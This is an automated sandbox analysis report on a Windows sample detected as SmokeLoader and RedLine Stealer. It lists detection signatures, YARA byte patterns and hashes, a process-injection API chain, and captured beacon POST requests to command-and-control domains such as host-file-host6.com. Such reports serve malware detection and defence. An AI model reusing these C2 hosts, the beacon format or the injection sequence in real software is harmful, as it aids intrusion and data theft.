Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ikNC1JE7rY.exe

Overview

General Information

Sample Name:ikNC1JE7rY.exe
Analysis ID:713054
MD5:44f5530502db25e5e66c15260ec4d25c
SHA1:ede93f48f848e0b70c6b883087923ea83f74e9d8
SHA256:4b952ac0a783e889a32e9528591e64eb51d41095b251c23c9763b3c8db973690
Tags:exeRedLineStealer
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • ikNC1JE7rY.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\ikNC1JE7rY.exe" MD5: 44F5530502DB25E5E66C15260EC4D25C)
    • ikNC1JE7rY.exe (PID: 4788 cmdline: "C:\Users\user\Desktop\ikNC1JE7rY.exe" MD5: 44F5530502DB25E5E66C15260EC4D25C)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • sifdvgf (PID: 2368 cmdline: C:\Users\user\AppData\Roaming\sifdvgf MD5: 44F5530502DB25E5E66C15260EC4D25C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x4f8c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x5154:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 3 entries
      SourceRuleDescriptionAuthorStrings
      10.2.ikNC1JE7rY.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        10.0.ikNC1JE7rY.exe.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          12.2.sifdvgf.4515a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            10.0.ikNC1JE7rY.exe.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 1 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: ikNC1JE7rY.exeReversingLabs: Detection: 72%
                Source: ikNC1JE7rY.exeVirustotal: Detection: 38%Perma Link
                Source: C:\Users\user\AppData\Roaming\sifdvgfReversingLabs: Detection: 72%
                Source: ikNC1JE7rY.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\sifdvgfJoe Sandbox ML: detected
                Source: 10.0.ikNC1JE7rY.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 10.0.ikNC1JE7rY.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 10.0.ikNC1JE7rY.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 10.0.ikNC1JE7rY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: ikNC1JE7rY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: *C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr
                Source: Binary string: C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: Joe Sandbox ViewASN Name: GULFSTREAMUA GULFSTREAMUA
                Source: Joe Sandbox ViewIP Address: 176.124.192.17 176.124.192.17
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.com
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.comData Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
                Source: explorer.exe, 0000000B.00000000.342540807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.372565994.000000000F270000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rleect.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-file-host6.com
                Source: unknownDNS traffic detected: queries for: host-file-host6.com

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 10.2.ikNC1JE7rY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.sifdvgf.4515a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.ikNC1JE7rY.exe.5215a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.ikNC1JE7rY.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: sifdvgf, 0000000C.00000002.515577370.00000000006DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: ikNC1JE7rY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0040E07E0_2_0040E07E
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_004139280_2_00413928
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00413E6C0_2_00413E6C
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00414AA80_2_00414AA8
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0041730C0_2_0041730C
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0040FBC10_2_0040FBC1
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_004143B00_2_004143B0
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0040E07E12_2_0040E07E
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0041392812_2_00413928
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_00413E6C12_2_00413E6C
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_00414AA812_2_00414AA8
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0041730C12_2_0041730C
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0040FBC112_2_0040FBC1
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_004143B012_2_004143B0
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: String function: 0040C128 appears 42 times
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: String function: 0040C128 appears 42 times
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00520110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_00520110
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_0040180C Sleep,NtTerminateProcess,10_2_0040180C
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_00401818 Sleep,NtTerminateProcess,10_2_00401818
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_00401822 Sleep,NtTerminateProcess,10_2_00401822
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_00401826 Sleep,NtTerminateProcess,10_2_00401826
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_00401834 Sleep,NtTerminateProcess,10_2_00401834
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: ikNC1JE7rY.exeReversingLabs: Detection: 72%
                Source: ikNC1JE7rY.exeVirustotal: Detection: 38%
                Source: ikNC1JE7rY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe"
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeProcess created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\sifdvgf C:\Users\user\AppData\Roaming\sifdvgf
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeProcess created: C:\Users\user\Desktop\ikNC1JE7rY.exe "C:\Users\user\Desktop\ikNC1JE7rY.exe" Jump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sifdvgfJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@4/2@4/1
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ikNC1JE7rY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: *C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr
                Source: Binary string: C:\goc\gohu\weyexudu\zewudu\poxiwop55\lelifix.pdb source: ikNC1JE7rY.exe, sifdvgf.11.dr
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0040548C pushad ; retf 0_2_004054AD
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00407168 push eax; ret 0_2_00407186
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0040C16D push ecx; ret 0_2_0040C180
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00521970 push ebx; iretd 0_2_005219B7
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_00521977 push ebx; iretd 0_2_005219B7
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 0_2_0052198B push ebx; iretd 0_2_005219B7
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_004011D0 push ebx; iretd 10_2_00401217
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_004011D7 push ebx; iretd 10_2_00401217
                Source: C:\Users\user\Desktop\ikNC1JE7rY.exeCode function: 10_2_004011EB push ebx; iretd 10_2_00401217
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0040548C pushad ; retf 12_2_004054AD
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_00407168 push eax; ret 12_2_00407186
                Source: C:\Users\user\AppData\Roaming\sifdvgfCode function: 12_2_0040C16D push ecx; ret 12_2_0040C180
